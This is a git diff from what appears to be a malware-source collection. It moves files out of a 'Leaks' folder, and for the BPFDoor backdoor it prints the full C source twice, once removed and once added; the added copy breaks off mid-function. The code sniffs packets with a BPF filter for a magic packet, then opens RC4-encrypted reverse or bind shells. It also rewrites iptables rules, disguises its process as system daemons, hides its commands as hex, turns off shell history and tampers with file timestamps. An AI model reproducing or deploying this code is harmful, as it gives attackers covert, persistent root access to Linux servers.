diff --git a/Leaks/Linux/Linux.BotenaGo.go b/Linux/Linux.BotenaGo.go similarity index 100% rename from Leaks/Linux/Linux.BotenaGo.go rename to Linux/Linux.BotenaGo.go diff --git a/Leaks/Linux/Linux.RedMenshenBPFDoor.c b/Linux/Linux.RedMenshenBPFDoor.c similarity index 96% rename from Leaks/Linux/Linux.RedMenshenBPFDoor.c rename to Linux/Linux.RedMenshenBPFDoor.c index 88805a7ff..8ba6d209c 100644 --- a/Leaks/Linux/Linux.RedMenshenBPFDoor.c +++ b/Linux/Linux.RedMenshenBPFDoor.c @@ -1,900 +1,900 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#ifndef PR_SET_NAME -#define PR_SET_NAME 15 -#endif - -extern char **environ; - -#define __SID ('S' << 8) -#define I_PUSH (__SID | 2) - -struct sniff_ip { - unsigned char ip_vhl; - unsigned char ip_tos; - unsigned short int ip_len; - unsigned short int ip_id; - unsigned short int ip_off; - #define IP_RF 0x8000 - #define IP_DF 0x4000 - #define IP_MF 0x2000 - #define IP_OFFMASK 0x1fff - unsigned char ip_ttl; - unsigned char ip_p; - unsigned short int ip_sum; - struct in_addr ip_src,ip_dst; -}; -#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f) -#define IP_V(ip) (((ip)->ip_vhl) >> 4) - -typedef unsigned int tcp_seq; -struct sniff_tcp { - unsigned short int th_sport; - unsigned short int th_dport; - tcp_seq th_seq; - tcp_seq th_ack; - unsigned char th_offx2; - #define TH_OFF(th) (((th)->th_offx2 & 0xf0) >> 4) - unsigned char th_flags; - #define TH_FIN 0x01 - #define TH_SYN 0x02 - #define TH_RST 0x04 - #define TH_PUSH 0x08 - #define TH_ACK 0x10 - #define TH_URG 0x20 - #define TH_ECE 0x40 - #define TH_CWR 0x80 - #define TH_FLAGS (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR) - unsigned short int th_win; - unsigned short int th_sum; - unsigned short int th_urp; -} __attribute__ ((packed)); - -struct sniff_udp { - uint16_t uh_sport; - uint16_t uh_dport; - uint16_t uh_ulen; - uint16_t uh_sum; -} __attribute__ ((packed)); - -struct magic_packet{ - unsigned int flag; - in_addr_t ip; - unsigned short port; - char pass[14]; -} __attribute__ ((packed)); - -#ifndef uchar -#define uchar unsigned char -#endif - -typedef struct { - uchar state[256]; - uchar x, y; -} rc4_ctx; - -extern char *ptsname(int); -extern int grantpt(int fd); -extern int unlockpt(int fd); -extern int ioctl (int __fd, unsigned long int __request, ...) __THROW; - -#define TIOCSCTTY 0x540E -#define TIOCGWINSZ 0x5413 -#define TIOCSWINSZ 0x5414 -#define ECHAR 0x0b - -#define BUF 32768 - -struct config { - char stime[4]; - char etime[4]; - char mask[512]; - char pass[14]; - char pass2[14]; -} __attribute__ ((packed)); - -struct config cfg; -int pty, tty; -int godpid; -char pid_path[50]; - -int shell(int, char *, char *); -void getshell(char *ip, int); - -char *argv0 = NULL; - -rc4_ctx crypt_ctx, decrypt_ctx; - -void xchg(uchar *a, uchar *b) -{ - uchar c = *a; - *a = *b; - *b = c; -} - -void rc4_init (uchar *key, int len, rc4_ctx *ctx) -{ - uchar index1, index2; - uchar *state = ctx->state; - uchar i; - - i = 0; - do { - state[i] = i; - i++; - } while (i); - - ctx->x = ctx->y = 0; - index1 = index2 = 0; - do { - index2 = key[index1] + state[i] + index2; - xchg(&state[i], &state[index2]); - index1++; - if (index1 >= len) - index1 = 0; - i++; - } while (i); -} - -void rc4 (uchar *data, int len, rc4_ctx *ctx) -{ - uchar *state = ctx->state; - uchar x = ctx->x; - uchar y = ctx->y; - int i; - - for (i = 0; i < len; i++) { - uchar xor; - - x++; - y = state[x] + y; - xchg(&state[x], &state[y]); - - xor = state[x] + state[y]; - data[i] ^= state[xor]; - } - - ctx->x = x; - ctx->y = y; -} - -int cwrite(int fd, void *buf, int count) -{ - uchar *tmp; - int ret; - - if (!count) - return 0; - tmp = malloc(count); - if (!tmp) - return 0; - memcpy(tmp, buf, count); - rc4(tmp, count, &crypt_ctx); - ret = write(fd, tmp, count); - free(tmp); - return ret; -} - -int cread(int fd, void *buf, int count) -{ - int i; - - if (!count) - return 0; - i = read(fd, buf, count); - - if (i > 0) - rc4(buf, i, &decrypt_ctx); - return i; -} - -static void remove_pid(char *pp) -{ - unlink(pp); -} - -static void setup_time(char *file) -{ - struct timeval tv[2]; - - tv[0].tv_sec = 1225394236; - tv[0].tv_usec = 0; - - tv[1].tv_sec = 1225394236; - tv[1].tv_usec = 0; - - utimes(file, tv); -} -static void terminate(void) -{ - if (getpid() == godpid) - remove_pid(pid_path); - - _exit(EXIT_SUCCESS); -} - -static void on_terminate(int signo) -{ - terminate(); -} -static void init_signal(void) -{ - atexit(terminate); - signal(SIGTERM, on_terminate); - return; -} - -void sig_child(int i) -{ - signal(SIGCHLD, sig_child); - waitpid(-1, NULL, WNOHANG); -} - -int ptym_open(char *pts_name) -{ - char *ptr; - int fd; - - strcpy(pts_name,"/dev/ptmx"); - if ((fd = open(pts_name,O_RDWR)) < 0) { - return -1; - } - - if (grantpt(fd) < 0) { - close(fd); - return -2; - } - - if (unlockpt(fd) < 0) { - close(fd); - return -3; - } - - if ((ptr = ptsname(fd)) == NULL) { - close(fd); - return -4; - } - - strcpy(pts_name,ptr); - - return fd; -} - -int ptys_open(int fd,char *pts_name) -{ - int fds; - - if ((fds = open(pts_name,O_RDWR)) < 0) { - close(fd); - return -5; - } - - - if (ioctl(fds,I_PUSH,"ptem") < 0) { - return fds; - } - - if (ioctl(fds,I_PUSH,"ldterm") < 0) { - return fds; - } - - if (ioctl(fds,I_PUSH,"ttcompat") < 0) { - return fds; - } - - return fds; -} - -int open_tty() -{ - char pts_name[20]; - - pty = ptym_open(pts_name); - - tty = ptys_open(pty,pts_name); - - if (pty >= 0 && tty >=0 ) - return 1; - return 0; -} - -int try_link(in_addr_t ip, unsigned short port) -{ - struct sockaddr_in serv_addr; - int sock; - - bzero(&serv_addr, sizeof(serv_addr)); - - serv_addr.sin_addr.s_addr = ip; - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { - return -1; - } - - serv_addr.sin_family = AF_INET; - serv_addr.sin_port = port; - - if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(struct sockaddr)) == -1 ) { - close(sock); - return -1; - } - return sock; -} - -int mon(in_addr_t ip, unsigned short port) -{ - struct sockaddr_in remote; - int sock; - int s_len; - - bzero(&remote, sizeof(remote)); - if ((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < -1) { - return -1; - } - remote.sin_family = AF_INET; - remote.sin_port = port; - remote.sin_addr.s_addr = ip; - - if ((s_len = sendto(sock, "1", 1, 0, (struct sockaddr *)&remote, sizeof(struct sockaddr))) < 0) { - close(sock); - return -1; - } - close(sock); - return s_len; -} - -int set_proc_name(int argc, char **argv, char *new) -{ - size_t size = 0; - int i; - char *raw = NULL; - char *last = NULL; - - argv0 = argv[0]; - - for (i = 0; environ[i]; i++) - size += strlen(environ[i]) + 1; - - raw = (char *) malloc(size); - if (NULL == raw) - return -1; - - for (i = 0; environ[i]; i++) - { - memcpy(raw, environ[i], strlen(environ[i]) + 1); - environ[i] = raw; - raw += strlen(environ[i]) + 1; - } - - last = argv[0]; - - for (i = 0; i < argc; i++) - last += strlen(argv[i]) + 1; - for (i = 0; environ[i]; i++) - last += strlen(environ[i]) + 1; - - memset(argv0, 0x00, last - argv0); - strncpy(argv0, new, last - argv0); - - prctl(PR_SET_NAME, (unsigned long) new); - return 0; -} -int to_open(char *name, char *tmp) -{ - char cmd[256] = {0}; - char fmt[] = { - 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x72, 0x6d, 0x20, 0x2d, 0x66, - 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, 0x2f, - 0x25, 0x73, 0x3b, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x63, 0x70, - 0x20, 0x25, 0x73, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, - 0x68, 0x6d, 0x2f, 0x25, 0x73, 0x20, 0x26, 0x26, 0x20, 0x2f, - 0x62, 0x69, 0x6e, 0x2f, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, - 0x37, 0x35, 0x35, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, - 0x68, 0x6d, 0x2f, 0x25, 0x73, 0x20, 0x26, 0x26, 0x20, 0x2f, - 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, 0x2f, 0x25, 0x73, - 0x20, 0x2d, 0x2d, 0x69, 0x6e, 0x69, 0x74, 0x20, 0x26, 0x26, - 0x20, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x72, 0x6d, 0x20, 0x2d, - 0x66, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, - 0x2f, 0x25, 0x73, 0x00}; // /bin/rm -f /dev/shm/%s;/bin/cp %s /dev/shm/%s && /bin/chmod 755 /dev/shm/%s && /dev/shm/%s --init && /bin/rm -f /dev/shm/%s - - snprintf(cmd, sizeof(cmd), fmt, tmp, name, tmp, tmp, tmp, tmp); - system(cmd); - sleep(2); - if (access(pid_path, R_OK) == 0) - return 0; - return 1; -} - -int logon(const char *hash) -{ - int x = 0; - x = memcmp(cfg.pass, hash, strlen(cfg.pass)); - if (x == 0) - return 0; - x = memcmp(cfg.pass2, hash, strlen(cfg.pass2)); - if (x == 0) - return 1; - - return 2; -} - -void packet_loop() -{ - int sock, r_len, pid, scli, size_ip, size_tcp; - socklen_t psize; - uchar buff[512]; - const struct sniff_ip *ip; - const struct sniff_tcp *tcp; - struct magic_packet *mp; - const struct sniff_udp *udp; - in_addr_t bip; - char *pbuff = NULL; - - // - // Filter Options Build Filter Struct - // - - struct sock_fprog filter; - struct sock_filter bpf_code[] = { - { 0x28, 0, 0, 0x0000000c }, - { 0x15, 0, 27, 0x00000800 }, - { 0x30, 0, 0, 0x00000017 }, - { 0x15, 0, 5, 0x00000011 }, - { 0x28, 0, 0, 0x00000014 }, - { 0x45, 23, 0, 0x00001fff }, - { 0xb1, 0, 0, 0x0000000e }, - { 0x48, 0, 0, 0x00000016 }, - { 0x15, 19, 20, 0x00007255 }, - { 0x15, 0, 7, 0x00000001 }, - { 0x28, 0, 0, 0x00000014 }, - { 0x45, 17, 0, 0x00001fff }, - { 0xb1, 0, 0, 0x0000000e }, - { 0x48, 0, 0, 0x00000016 }, - { 0x15, 0, 14, 0x00007255 }, - { 0x50, 0, 0, 0x0000000e }, - { 0x15, 11, 12, 0x00000008 }, - { 0x15, 0, 11, 0x00000006 }, - { 0x28, 0, 0, 0x00000014 }, - { 0x45, 9, 0, 0x00001fff }, - { 0xb1, 0, 0, 0x0000000e }, - { 0x50, 0, 0, 0x0000001a }, - { 0x54, 0, 0, 0x000000f0 }, - { 0x74, 0, 0, 0x00000002 }, - { 0xc, 0, 0, 0x00000000 }, - { 0x7, 0, 0, 0x00000000 }, - { 0x48, 0, 0, 0x0000000e }, - { 0x15, 0, 1, 0x00005293 }, - { 0x6, 0, 0, 0x0000ffff }, - { 0x6, 0, 0, 0x00000000 }, - }; - - filter.len = sizeof(bpf_code)/sizeof(bpf_code[0]); - filter.filter = bpf_code; - - // - // Build a rawsocket that binds the NIC to receive Ethernet frames - // - - if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP))) < 1) - return; - - // - // Set a packet filter - // - - if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_FILTER, &filter, sizeof(filter)) == -1) { - return; - } - - - // - // Loop to Read Packets in 512 Chunks - // - - - while (1) { - memset(buff, 0, 512); - psize = 0; - r_len = recvfrom(sock, buff, 512, 0x0, NULL, NULL); - - ip = (struct sniff_ip *)(buff+14); - size_ip = IP_HL(ip)*4; - if (size_ip < 20) continue; - - // determine protocl from packet (offset 14) - switch(ip->ip_p) { - case IPPROTO_TCP: - tcp = (struct sniff_tcp*)(buff+14+size_ip); - size_tcp = TH_OFF(tcp)*4; - mp = (struct magic_packet *)(buff+14+size_ip+size_tcp); - break; - case IPPROTO_UDP: - udp = (struct sniff_udp *)(ip+1); - mp = (struct magic_packet *)(udp+1); - break; - case IPPROTO_ICMP: - pbuff = (char *)(ip+1); - mp = (struct magic_packet *)(pbuff+8); - break; - default: - break; - } - - // if magic packet is set process - - if (mp) { - if (mp->ip == INADDR_NONE) - bip = ip->ip_src.s_addr; - else - bip = mp->ip; - - pid = fork(); - if (pid) { - waitpid(pid, NULL, WNOHANG); - } - else { - int cmp = 0; - char sip[20] = {0}; - char pname[] = {0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x69, 0x62, 0x65, 0x78, 0x65, 0x63, 0x2f, 0x70, 0x6f, 0x73, 0x74, 0x66, 0x69, 0x78, 0x2f, 0x6d, 0x61, 0x73, 0x74, 0x65, - 0x72, 0x00}; // /usr/libexec/postfix/master - - if (fork()) exit(0); - chdir("/"); - setsid(); - signal(SIGHUP, SIG_DFL); - memset(argv0, 0, strlen(argv0)); - strcpy(argv0, pname); // sets process name (/usr/libexec/postfix/master) - prctl(PR_SET_NAME, (unsigned long) pname); - - rc4_init(mp->pass, strlen(mp->pass), &crypt_ctx); - rc4_init(mp->pass, strlen(mp->pass), &decrypt_ctx); - - cmp = logon(mp->pass); - switch(cmp) { - case 1: - strcpy(sip, inet_ntoa(ip->ip_src)); - getshell(sip, ntohs(tcp->th_dport)); - break; - case 0: - scli = try_link(bip, mp->port); - if (scli > 0) - shell(scli, NULL, NULL); - break; - case 2: - mon(bip, mp->port); - break; - } - exit(0); - } - } - - } - close(sock); -} - -int b(int *p) -{ - int port; - struct sockaddr_in my_addr; - int sock_fd; - int flag = 1; - - if( (sock_fd = socket(AF_INET,SOCK_STREAM,0)) == -1 ){ - return -1; - } - - setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, (char*)&flag,sizeof(flag)); - - my_addr.sin_family = AF_INET; - my_addr.sin_addr.s_addr = 0; - - for (port = 42391; port < 43391; port++) { - my_addr.sin_port = htons(port); - if( bind(sock_fd,(struct sockaddr *)&my_addr,sizeof(struct sockaddr)) == -1 ){ - continue; - } - if( listen(sock_fd,1) == 0 ) { - *p = port; - return sock_fd; - } - close(sock_fd); - } - return -1; -} - -int w(int sock) -{ - socklen_t size; - struct sockaddr_in remote_addr; - int sock_id; - - size = sizeof(struct sockaddr_in); - if( (sock_id = accept(sock,(struct sockaddr *)&remote_addr, &size)) == -1 ){ - return -1; - } - - close(sock); - return sock_id; - -} - -void getshell(char *ip, int fromport) -{ - int sock, sockfd, toport; - char cmd[512] = {0}, rcmd[512] = {0}, dcmd[512] = {0}; - char cmdfmt[] = { - 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, - 0x65, 0x73, 0x20, 0x2d, 0x74, 0x20, 0x6e, 0x61, 0x74, 0x20, 0x2d, 0x41, - 0x20, 0x50, 0x52, 0x45, 0x52, 0x4f, 0x55, 0x54, 0x49, 0x4e, 0x47, 0x20, - 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, - 0x20, 0x2d, 0x2d, 0x64, 0x70, 0x6f, 0x72, 0x74, 0x20, 0x25, 0x64, 0x20, - 0x2d, 0x6a, 0x20, 0x52, 0x45, 0x44, 0x49, 0x52, 0x45, 0x43, 0x54, 0x20, - 0x2d, 0x2d, 0x74, 0x6f, 0x2d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x20, 0x25, - 0x64, 0x00}; // /sbin/iptables -t nat -A PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d - char rcmdfmt[] = { - 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, - 0x65, 0x73, 0x20, 0x2d, 0x74, 0x20, 0x6e, 0x61, 0x74, 0x20, 0x2d, 0x44, - 0x20, 0x50, 0x52, 0x45, 0x52, 0x4f, 0x55, 0x54, 0x49, 0x4e, 0x47, 0x20, - 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, - 0x20, 0x2d, 0x2d, 0x64, 0x70, 0x6f, 0x72, 0x74, 0x20, 0x25, 0x64, 0x20, - 0x2d, 0x6a, 0x20, 0x52, 0x45, 0x44, 0x49, 0x52, 0x45, 0x43, 0x54, 0x20, - 0x2d, 0x2d, 0x74, 0x6f, 0x2d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x20, 0x25, - 0x64, 0x00}; // /sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d - char inputfmt[] = { - 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, - 0x65, 0x73, 0x20, 0x2d, 0x49, 0x20, 0x49, 0x4e, 0x50, 0x55, 0x54, 0x20, - 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, - 0x20, 0x2d, 0x6a, 0x20, 0x41, 0x43, 0x43, 0x45, 0x50, 0x54, 0x00}; // /sbin/iptables -I INPUT -p tcp -s %s -j ACCEPT - char dinputfmt[] = { - 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, - 0x65, 0x73, 0x20, 0x2d, 0x44, 0x20, 0x49, 0x4e, 0x50, 0x55, 0x54, 0x20, - 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, - 0x20, 0x2d, 0x6a, 0x20, 0x41, 0x43, 0x43, 0x45, 0x50, 0x54, 0x00}; // /sbin/iptables -D INPUT -p tcp -s %s -j ACCEPT - - sockfd = b(&toport); // looks like it selects random ephemral port here - if (sockfd == -1) return; - - snprintf(cmd, sizeof(cmd), inputfmt, ip); - snprintf(dcmd, sizeof(dcmd), dinputfmt, ip); - system(cmd); // executes /sbin/iptables -I INPUT -p tcp -s %s -j ACCEPT - sleep(1); - memset(cmd, 0, sizeof(cmd)); - snprintf(cmd, sizeof(cmd), cmdfmt, ip, fromport, toport); - snprintf(rcmd, sizeof(rcmd), rcmdfmt, ip, fromport, toport); - system(cmd); // executes /sbin/iptables -t nat -A PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d - sleep(1); - sock = w(sockfd); // creates a sock that listens on port specified earlier - if( sock < 0 ){ - close(sock); - return; - } - - // - // passes sock and - // rcmd = /sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d - // dcmd = /sbin/iptables -D INPUT -p tcp -s %s -j ACCEPT - // - // - - shell(sock, rcmd, dcmd); - close(sock); -} - -int shell(int sock, char *rcmd, char *dcmd) -{ - int subshell; - fd_set fds; - char buf[BUF]; - char argx[] = { - 0x71, 0x6d, 0x67, 0x72, 0x20, 0x2d, 0x6c, 0x20, 0x2d, 0x74, - 0x20, 0x66, 0x69, 0x66, 0x6f, 0x20, 0x2d, 0x75, 0x00}; // qmgr -l -t fifo -u - char *argvv[] = {argx, NULL, NULL}; - #define MAXENV 256 - #define ENVLEN 256 - char *envp[MAXENV]; - char sh[] = {0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00}; // /bin/sh - int ret; - char home[] = {0x48, 0x4f, 0x4d, 0x45, 0x3d, 0x2f, 0x74, 0x6d, 0x70, 0x00}; // HOME=/tmp - char ps[] = { - 0x50, 0x53, 0x31, 0x3d, 0x5b, 0x5c, 0x75, 0x40, 0x5c, 0x68, 0x20, - 0x5c, 0x57, 0x5d, 0x5c, 0x5c, 0x24, 0x20, 0x00}; // PS1=[\u@\h \W]\\$ - char histfile[] = { - 0x48, 0x49, 0x53, 0x54, 0x46, 0x49, 0x4c, 0x45, 0x3d, 0x2f, 0x64, - 0x65, 0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x00}; // HISTFILE=/dev/null - char mshist[] = { - 0x4d, 0x59, 0x53, 0x51, 0x4c, 0x5f, 0x48, 0x49, 0x53, 0x54, 0x46, - 0x49, 0x4c, 0x45, 0x3d, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x6e, 0x75, - 0x6c, 0x6c, 0x00}; // MYSQL_HISTFILE=/dev/null - char ipath[] = { - 0x50, 0x41, 0x54, 0x48, 0x3d, 0x2f, 0x62, 0x69, 0x6e, - 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6b, 0x65, 0x72, 0x62, 0x65, - 0x72, 0x6f, 0x73, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, - 0x73, 0x72, 0x2f, 0x6b, 0x65, 0x72, 0x62, 0x65, 0x72, 0x6f, 0x73, - 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, - 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, - 0x73, 0x72, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, - 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x2f, 0x62, 0x69, 0x6e, - 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, - 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, - 0x58, 0x31, 0x31, 0x52, 0x36, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2e, - 0x2f, 0x62, 0x69, 0x6e, 0x00}; // PATH=/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin:./bin - char term[] = "vt100"; - - envp[0] = home; - envp[1] = ps; - envp[2] = histfile; - envp[3] = mshist; - envp[4] = ipath; - envp[5] = term; - envp[6] = NULL; - - if (rcmd != NULL) - system(rcmd); - if (dcmd != NULL) - system(dcmd); - write(sock, "3458", 4); - if (!open_tty()) { - if (!fork()) { - dup2(sock, 0); - dup2(sock, 1); - dup2(sock, 2); - execve(sh, argvv, envp); - } - close(sock); - return 0; - } - - subshell = fork(); - if (subshell == 0) { - close(pty); - ioctl(tty, TIOCSCTTY); - close(sock); - dup2(tty, 0); - dup2(tty, 1); - dup2(tty, 2); - close(tty); - execve(sh, argvv, envp); - } - close(tty); - - while (1) { - FD_ZERO(&fds); - FD_SET(pty, &fds); - FD_SET(sock, &fds); - if (select((pty > sock) ? (pty+1) : (sock+1), - &fds, NULL, NULL, NULL) < 0) - { - break; - } - if (FD_ISSET(pty, &fds)) { - int count; - count = read(pty, buf, BUF); - if (count <= 0) break; - if (cwrite(sock, buf, count) <= 0) break; - } - if (FD_ISSET(sock, &fds)) { - int count; - unsigned char *p, *d; - d = (unsigned char *)buf; - count = cread(sock, buf, BUF); - if (count <= 0) break; - - p = memchr(buf, ECHAR, count); - if (p) { - unsigned char wb[5]; - int rlen = count - ((long) p - (long) buf); - struct winsize ws; - - if (rlen > 5) rlen = 5; - memcpy(wb, p, rlen); - if (rlen < 5) { - ret = cread(sock, &wb[rlen], 5 - rlen); - } - - ws.ws_xpixel = ws.ws_ypixel = 0; - ws.ws_col = (wb[1] << 8) + wb[2]; - ws.ws_row = (wb[3] << 8) + wb[4]; - ioctl(pty, TIOCSWINSZ, &ws); - kill(0, SIGWINCH); - - ret = write(pty, buf, (long) p - (long) buf); - rlen = ((long) buf + count) - ((long)p+5); - if (rlen > 0) ret = write(pty, p+5, rlen); - } else - if (write(pty, d, count) <= 0) break; - } - } - close(sock); - close(pty); - waitpid(subshell, NULL, 0); - vhangup(); - exit(0); -} - -int main(int argc, char *argv[]) -{ - char hash[] = {0x6a, 0x75, 0x73, 0x74, 0x66, 0x6f, 0x72, 0x66, 0x75, 0x6e, 0x00}; // justforfun - char hash2[]= {0x73, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x00}; // socket - char *self[] = { - "/sbin/udevd -d", - "/sbin/mingetty /dev/tty7", - "/usr/sbin/console-kit-daemon --no-daemon", - "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event", - "dbus-daemon --system", - "hald-runner", - "pickup -l -t fifo -u", - "avahi-daemon: chroot helper", - "/sbin/auditd -n", - "/usr/lib/systemd/systemd-journald" - }; - - pid_path[0] = 0x2f; pid_path[1] = 0x76; pid_path[2] = 0x61; - pid_path[3] = 0x72; pid_path[4] = 0x2f; pid_path[5] = 0x72; - pid_path[6] = 0x75; pid_path[7] = 0x6e; pid_path[8] = 0x2f; - pid_path[9] = 0x68; pid_path[10] = 0x61; pid_path[11] = 0x6c; - pid_path[12] = 0x64; pid_path[13] = 0x72; pid_path[14] = 0x75; - pid_path[15] = 0x6e; pid_path[16] = 0x64; pid_path[17] = 0x2e; - pid_path[18] = 0x70; pid_path[19] = 0x69; pid_path[20] = 0x64; - pid_path[21] = 0x00; // /var/run/haldrund.pid - - if (access(pid_path, R_OK) == 0) { - exit(0); - } - - if (getuid() != 0) { - return 0; - } - - if (argc == 1) { - if (to_open(argv[0], "kdmtmpflush") == 0) - _exit(0); - _exit(-1); - } - - bzero(&cfg, sizeof(cfg)); - - srand((unsigned)time(NULL)); - strcpy(cfg.mask, self[rand()%10]); - strcpy(cfg.pass, hash); - strcpy(cfg.pass2, hash2); - - setup_time(argv[0]); - - set_proc_name(argc, argv, cfg.mask); - - if (fork()) exit(0); - init_signal(); - signal(SIGCHLD, sig_child); - godpid = getpid(); - - close(open(pid_path, O_CREAT|O_WRONLY, 0644)); - - signal(SIGCHLD,SIG_IGN); - setsid(); - packet_loop(); - return 0; +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifndef PR_SET_NAME +#define PR_SET_NAME 15 +#endif + +extern char **environ; + +#define __SID ('S' << 8) +#define I_PUSH (__SID | 2) + +struct sniff_ip { + unsigned char ip_vhl; + unsigned char ip_tos; + unsigned short int ip_len; + unsigned short int ip_id; + unsigned short int ip_off; + #define IP_RF 0x8000 + #define IP_DF 0x4000 + #define IP_MF 0x2000 + #define IP_OFFMASK 0x1fff + unsigned char ip_ttl; + unsigned char ip_p; + unsigned short int ip_sum; + struct in_addr ip_src,ip_dst; +}; +#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f) +#define IP_V(ip) (((ip)->ip_vhl) >> 4) + +typedef unsigned int tcp_seq; +struct sniff_tcp { + unsigned short int th_sport; + unsigned short int th_dport; + tcp_seq th_seq; + tcp_seq th_ack; + unsigned char th_offx2; + #define TH_OFF(th) (((th)->th_offx2 & 0xf0) >> 4) + unsigned char th_flags; + #define TH_FIN 0x01 + #define TH_SYN 0x02 + #define TH_RST 0x04 + #define TH_PUSH 0x08 + #define TH_ACK 0x10 + #define TH_URG 0x20 + #define TH_ECE 0x40 + #define TH_CWR 0x80 + #define TH_FLAGS (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR) + unsigned short int th_win; + unsigned short int th_sum; + unsigned short int th_urp; +} __attribute__ ((packed)); + +struct sniff_udp { + uint16_t uh_sport; + uint16_t uh_dport; + uint16_t uh_ulen; + uint16_t uh_sum; +} __attribute__ ((packed)); + +struct magic_packet{ + unsigned int flag; + in_addr_t ip; + unsigned short port; + char pass[14]; +} __attribute__ ((packed)); + +#ifndef uchar +#define uchar unsigned char +#endif + +typedef struct { + uchar state[256]; + uchar x, y; +} rc4_ctx; + +extern char *ptsname(int); +extern int grantpt(int fd); +extern int unlockpt(int fd); +extern int ioctl (int __fd, unsigned long int __request, ...) __THROW; + +#define TIOCSCTTY 0x540E +#define TIOCGWINSZ 0x5413 +#define TIOCSWINSZ 0x5414 +#define ECHAR 0x0b + +#define BUF 32768 + +struct config { + char stime[4]; + char etime[4]; + char mask[512]; + char pass[14]; + char pass2[14]; +} __attribute__ ((packed)); + +struct config cfg; +int pty, tty; +int godpid; +char pid_path[50]; + +int shell(int, char *, char *); +void getshell(char *ip, int); + +char *argv0 = NULL; + +rc4_ctx crypt_ctx, decrypt_ctx; + +void xchg(uchar *a, uchar *b) +{ + uchar c = *a; + *a = *b; + *b = c; +} + +void rc4_init (uchar *key, int len, rc4_ctx *ctx) +{ + uchar index1, index2; + uchar *state = ctx->state; + uchar i; + + i = 0; + do { + state[i] = i; + i++; + } while (i); + + ctx->x = ctx->y = 0; + index1 = index2 = 0; + do { + index2 = key[index1] + state[i] + index2; + xchg(&state[i], &state[index2]); + index1++; + if (index1 >= len) + index1 = 0; + i++; + } while (i); +} + +void rc4 (uchar *data, int len, rc4_ctx *ctx) +{ + uchar *state = ctx->state; + uchar x = ctx->x; + uchar y = ctx->y; + int i; + + for (i = 0; i < len; i++) { + uchar xor; + + x++; + y = state[x] + y; + xchg(&state[x], &state[y]); + + xor = state[x] + state[y]; + data[i] ^= state[xor]; + } + + ctx->x = x; + ctx->y = y; +} + +int cwrite(int fd, void *buf, int count) +{ + uchar *tmp; + int ret; + + if (!count) + return 0; + tmp = malloc(count); + if (!tmp) + return 0; + memcpy(tmp, buf, count); + rc4(tmp, count, &crypt_ctx); + ret = write(fd, tmp, count); + free(tmp); + return ret; +} + +int 